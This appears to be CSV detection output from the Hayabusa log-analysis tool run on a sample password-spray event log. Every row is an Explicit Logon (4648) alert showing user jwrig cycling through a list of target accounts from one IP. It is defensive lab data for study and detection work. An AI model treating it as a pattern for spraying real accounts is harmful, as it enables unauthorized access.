2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
